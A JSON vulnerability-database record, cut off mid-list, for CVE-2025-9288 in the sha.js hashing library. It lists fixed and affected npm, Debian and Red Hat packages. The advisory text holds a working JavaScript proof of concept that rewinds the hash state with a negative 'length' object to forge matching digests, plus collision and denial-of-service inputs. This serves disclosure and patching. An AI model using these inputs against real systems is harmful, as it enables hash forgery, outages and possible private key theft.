{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/28196?format=json","vulnerability_id":"VCID-eraj-dyxs-xkfd","summary":"sha.js is missing type checks leading to hash rewind and passing on crafted data\n### Summary\n\nThis is the same as [GHSA-cpq7-6gpm-g9rc](https://github.com/browserify/cipher-base/security/advisories/GHSA-cpq7-6gpm-g9rc) but just for `sha.js`, as it has its own implementation.\n\nMissing input type checks can allow types other than a well-formed `Buffer` or `string`, resulting in invalid values, hanging and rewinding the hash state (including turning a tagged hash into an untagged hash), or other generally undefined behaviour.\n\n### Details\n\nSee PoC\n\n### PoC\n```js\nconst forgeHash = (data, payload) => JSON.stringify([payload, { length: -payload.length}, [...data]])\n\nconst sha = require('sha.js')\nconst { randomBytes } = require('crypto')\n\nconst sha256 = (...messages) => {\n  const hash = sha('sha256')\n  messages.forEach((m) => hash.update(m))\n  return hash.digest('hex')\n}\n\nconst validMessage = [randomBytes(32), randomBytes(32), randomBytes(32)] // whatever\n\nconst payload = forgeHash(Buffer.concat(validMessage), 'Hashed input means safe')\nconst receivedMessage = JSON.parse(payload) // e.g. over network, whatever\n\nconsole.log(sha256(...validMessage))\nconsole.log(sha256(...receivedMessage))\nconsole.log(receivedMessage[0])\n```\n\nOutput:\n```\n638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4\n638d5bf3ca5d1decf7b78029f1c4a58558143d62d0848d71e27b2a6ff312d7c4\nHashed input means safe\n```\n\nOr just:\n```console\n> require('sha.js')('sha256').update('foo').digest('hex')\n'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'\n> require('sha.js')('sha256').update('fooabc').update({length:-3}).digest('hex')\n'2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae'\n```\n\n### Impact\n\n1. Hash state rewind on `{length: -x}`. This is behind the PoC above, also this way an attacker can turn a tagged hash in cryptographic libraries into an untagged hash.\n2. Value miscalculation, e.g. a collision is generated by `{ length: buf.length, ...buf, 0: buf[0] + 256 }`\n    This will result in the same hash as of `buf`, but can be treated by other code differently (e.g. bn.js)\n4. DoS on `{length:'1e99'}`\n5. On a subsequent system, (2) can turn into matching hashes but different numeric representations, leading to issues up to private key extraction from cryptography libraries (as nonce is often generated through a hash, and matching nonces for different values often immediately leads to private key restoration)","aliases":[{"alias":"CVE-2025-9288"},{"alias":"GHSA-95m3-7q98-8xr5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/932603?format=json","purl":"pkg:deb/debian/node-sha.js@2.4.11-2?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-sha.js@2.4.11-2%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932604?format=json","purl":"pkg:deb/debian/node-sha.js@2.4.11-2%2Bdeb11u1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-sha.js@2.4.11-2%252Bdeb11u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/1058106?format=json","purl":"pkg:deb/debian/node-sha.js@2.4.11%2B~2.4.0-2%2Bdeb12u1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-sha.js@2.4.11%252B~2.4.0-2%252Bdeb12u1"},{"url":"http://public2.vulnerablecode.io/api/packages/932602?format=json","purl":"pkg:deb/debian/node-sha.js@2.4.11%2B~2.4.0-2%2Bdeb12u1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-sha.js@2.4.11%252B~2.4.0-2%252Bdeb12u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932606?format=json","purl":"pkg:deb/debian/node-sha.js@2.4.11%2B~2.4.0-2%2Bdeb13u1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-sha.js@2.4.11%252B~2.4.0-2%252Bdeb13u1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/932605?format=json","purl":"pkg:deb/debian/node-sha.js@2.4.12%2B~3.0.5-1?distro=trixie","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-sha.js@2.4.12%252B~3.0.5-1%3Fdistro=trixie"},{"url":"http://public2.vulnerablecode.io/api/packages/69814?format=json","purl":"pkg:npm/sha.js@2.4.12","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.4.12"}],"affected_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1058105?format=json","purl":"pkg:deb/debian/node-sha.js@2.4.11-2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:deb/debian/node-sha.js@2.4.11-2"},{"url":"http://public2.vulnerablecode.io/api/packages/793105?format=json","purl":"pkg:npm/sha.js@0.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@0.0.0"},{"url":"http://public2.vulnerablecode.io/api/packages/793106?format=json","purl":"pkg:npm/sha.js@1.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@1.0.0"},{"url":"http://public2.vulnerablecode.io/api/packages/793107?format=json","purl":"pkg:npm/sha.js@1.1.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@1.1.0"},{"url":"http://public2.vulnerablecode.io/api/packages/793108?format=json","purl":"pkg:npm/sha.js@1.2.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@1.2.0"},{"url":"http://public2.vulnerablecode.io/api/packages/793109?format=json","purl":"pkg:npm/sha.js@1.2.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@1.2.1"},{"url":"http://public2.vulnerablecode.io/api/packages/793110?format=json","purl":"pkg:npm/sha.js@1.2.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@1.2.2"},{"url":"http://public2.vulnerablecode.io/api/packages/793111?format=json","purl":"pkg:npm/sha.js@1.3.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@1.3.0"},{"url":"http://public2.vulnerablecode.io/api/packages/793112?format=json","purl":"pkg:npm/sha.js@2.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.0.0"},{"url":"http://public2.vulnerablecode.io/api/packages/793113?format=json","purl":"pkg:npm/sha.js@2.1.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.1.1"},{"url":"http://public2.vulnerablecode.io/api/packages/793114?format=json","purl":"pkg:npm/sha.js@2.1.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.1.3"},{"url":"http://public2.vulnerablecode.io/api/packages/793115?format=json","purl":"pkg:npm/sha.js@2.1.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.1.4"},{"url":"http://public2.vulnerablecode.io/api/packages/793116?format=json","purl":"pkg:npm/sha.js@2.1.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.1.5"},{"url":"http://public2.vulnerablecode.io/api/packages/793117?format=json","purl":"pkg:npm/sha.js@2.1.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.1.6"},{"url":"http://public2.vulnerablecode.io/api/packages/793118?format=json","purl":"pkg:npm/sha.js@2.1.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.1.7"},{"url":"http://public2.vulnerablecode.io/api/packages/793119?format=json","purl":"pkg:npm/sha.js@2.1.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.1.8"},{"url":"http://public2.vulnerablecode.io/api/packages/793120?format=json","purl":"pkg:npm/sha.js@2.2.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.2.2"},{"url":"http://public2.vulnerablecode.io/api/packages/793121?format=json","purl":"pkg:npm/sha.js@2.2.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.2.3"},{"url":"http://public2.vulnerablecode.io/api/packages/793122?format=json","purl":"pkg:npm/sha.js@2.2.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.2.4"},{"url":"http://public2.vulnerablecode.io/api/packages/793123?format=json","purl":"pkg:npm/sha.js@2.2.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.2.5"},{"url":"http://public2.vulnerablecode.io/api/packages/793124?format=json","purl":"pkg:npm/sha.js@2.2.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.2.6"},{"url":"http://public2.vulnerablecode.io/api/packages/793125?format=json","purl":"pkg:npm/sha.js@2.2.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.2.7"},{"url":"http://public2.vulnerablecode.io/api/packages/793126?format=json","purl":"pkg:npm/sha.js@2.3.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.3.0"},{"url":"http://public2.vulnerablecode.io/api/packages/793127?format=json","purl":"pkg:npm/sha.js@2.3.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.3.1"},{"url":"http://public2.vulnerablecode.io/api/packages/793128?format=json","purl":"pkg:npm/sha.js@2.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.3.2"},{"url":"http://public2.vulnerablecode.io/api/packages/793129?format=json","purl":"pkg:npm/sha.js@2.3.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.3.3"},{"url":"http://public2.vulnerablecode.io/api/packages/793130?format=json","purl":"pkg:npm/sha.js@2.3.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.3.4"},{"url":"http://public2.vulnerablecode.io/api/packages/793131?format=json","purl":"pkg:npm/sha.js@2.3.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.3.5"},{"url":"http://public2.vulnerablecode.io/api/packages/793132?format=json","purl":"pkg:npm/sha.js@2.3.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.3.6"},{"url":"http://public2.vulnerablecode.io/api/packages/793133?format=json","purl":"pkg:npm/sha.js@2.4.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.4.0"},{"url":"http://public2.vulnerablecode.io/api/packages/793134?format=json","purl":"pkg:npm/sha.js@2.4.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.4.1"},{"url":"http://public2.vulnerablecode.io/api/packages/793135?format=json","purl":"pkg:npm/sha.js@2.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.4.2"},{"url":"http://public2.vulnerablecode.io/api/packages/793136?format=json","purl":"pkg:npm/sha.js@2.4.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.4.3"},{"url":"http://public2.vulnerablecode.io/api/packages/793137?format=json","purl":"pkg:npm/sha.js@2.4.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.4.4"},{"url":"http://public2.vulnerablecode.io/api/packages/793138?format=json","purl":"pkg:npm/sha.js@2.4.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.4.5"},{"url":"http://public2.vulnerablecode.io/api/packages/793139?format=json","purl":"pkg:npm/sha.js@2.4.7","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.4.7"},{"url":"http://public2.vulnerablecode.io/api/packages/793140?format=json","purl":"pkg:npm/sha.js@2.4.8","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.4.8"},{"url":"http://public2.vulnerablecode.io/api/packages/793141?format=json","purl":"pkg:npm/sha.js@2.4.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.4.9"},{"url":"http://public2.vulnerablecode.io/api/packages/793142?format=json","purl":"pkg:npm/sha.js@2.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.4.10"},{"url":"http://public2.vulnerablecode.io/api/packages/793143?format=json","purl":"pkg:npm/sha.js@2.4.11","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-eraj-dyxs-xkfd"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/sha.js@2.4.11"},{"url":"http://public2.vulnerablecode.io/api/packages/89296?format=json","purl":"pkg:rpm/redhat/acm-cli@container-v2.12?arch=5-4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-cli@container-v2.12%3Farch=5-4"},{"url":"http://public2.vulnerablecode.io/api/packages/89281?format=json","purl":"pkg:rpm/redhat/acm-cluster-permission@container-v2.12?arch=5-4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-cluster-permission@container-v2.12%3Farch=5-4"},{"url":"http://public2.vulnerablecode.io/api/packages/89307?format=json","purl":"pkg:rpm/redhat/acm-governance-policy-addon-controller@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-governance-policy-addon-controller@container-v2.12%3Farch=5-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89338?format=json","purl":"pkg:rpm/redhat/acm-governance-policy-framework-addon@container-v2.12?arch=5-4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-governance-policy-framework-addon@container-v2.12%3Farch=5-4"},{"url":"http://public2.vulnerablecode.io/api/packages/89284?format=json","purl":"pkg:rpm/redhat/acm-grafana@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-grafana@container-v2.12%3Farch=5-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89316?format=json","purl":"pkg:rpm/redhat/acm-multicluster-observability-addon@container-v2.12?arch=5-4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-multicluster-observability-addon@container-v2.12%3Farch=5-4"},{"url":"http://public2.vulnerablecode.io/api/packages/89300?format=json","purl":"pkg:rpm/redhat/acm-must-gather@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-must-gather@container-v2.12%3Farch=5-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89314?format=json","purl":"pkg:rpm/redhat/acm-operator-bundle@container-v2.12?arch=5-9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-operator-bundle@container-v2.12%3Farch=5-9"},{"url":"http://public2.vulnerablecode.io/api/packages/89290?format=json","purl":"pkg:rpm/redhat/acm-prometheus-config-reloader@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-prometheus-config-reloader@container-v2.12%3Farch=5-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89291?format=json","purl":"pkg:rpm/redhat/acm-prometheus-operator@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-prometheus-operator@container-v2.12%3Farch=5-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89342?format=json","purl":"pkg:rpm/redhat/acm-search-indexer@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-search-indexer@container-v2.12%3Farch=5-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89339?format=json","purl":"pkg:rpm/redhat/acm-search-v2-api@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-search-v2-api@container-v2.12%3Farch=5-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89308?format=json","purl":"pkg:rpm/redhat/acm-search-v2-operator@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-search-v2-operator@container-v2.12%3Farch=5-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89337?format=json","purl":"pkg:rpm/redhat/acm-siteconfig@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-siteconfig@container-v2.12%3Farch=5-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89273?format=json","purl":"pkg:rpm/redhat/acm-volsync-addon-controller@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/acm-volsync-addon-controller@container-v2.12%3Farch=5-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89289?format=json","purl":"pkg:rpm/redhat/cert-policy-controller@container-v2.12?arch=5-4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/cert-policy-controller@container-v2.12%3Farch=5-4"},{"url":"http://public2.vulnerablecode.io/api/packages/89343?format=json","purl":"pkg:rpm/redhat/cluster-backup-operator@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/cluster-backup-operator@container-v2.12%3Farch=5-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89350?format=json","purl":"pkg:rpm/redhat/config-policy-controller@container-v2.12?arch=5-4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/config-policy-controller@container-v2.12%3Farch=5-4"},{"url":"http://public2.vulnerablecode.io/api/packages/89333?format=json","purl":"pkg:rpm/redhat/console@container-v2.12?arch=5-5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/console@container-v2.12%3Farch=5-5"},{"url":"http://public2.vulnerablecode.io/api/packages/89330?format=json","purl":"pkg:rpm/redhat/endpoint-monitoring-operator@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/endpoint-monitoring-operator@container-v2.12%3Farch=5-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89275?format=json","purl":"pkg:rpm/redhat/governance-policy-propagator@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/governance-policy-propagator@container-v2.12%3Farch=5-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89297?format=json","purl":"pkg:rpm/redhat/grafana-dashboard-loader@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/grafana-dashboard-loader@container-v2.12%3Farch=5-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89278?format=json","purl":"pkg:rpm/redhat/insights-client@container-v2.12?arch=5-3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:rpm/redhat/insights-client@container-v2.12%3Farch=5-3"},{"url":"http://public2.vulnerablecode.io/api/packages/89294?format=json","purl":"pkg:rpm/redhat/insights-metrics@container-v2.12?arch=5-4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4pq8-1dxx-37gj"},{"vulnerability":"VCID-eraj-dyxs-xkfd"},{"vulnerability":"VCID-fr74-wcxv-quam"},{"vulnerability":"VCID-tt31-4d54-k7cz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg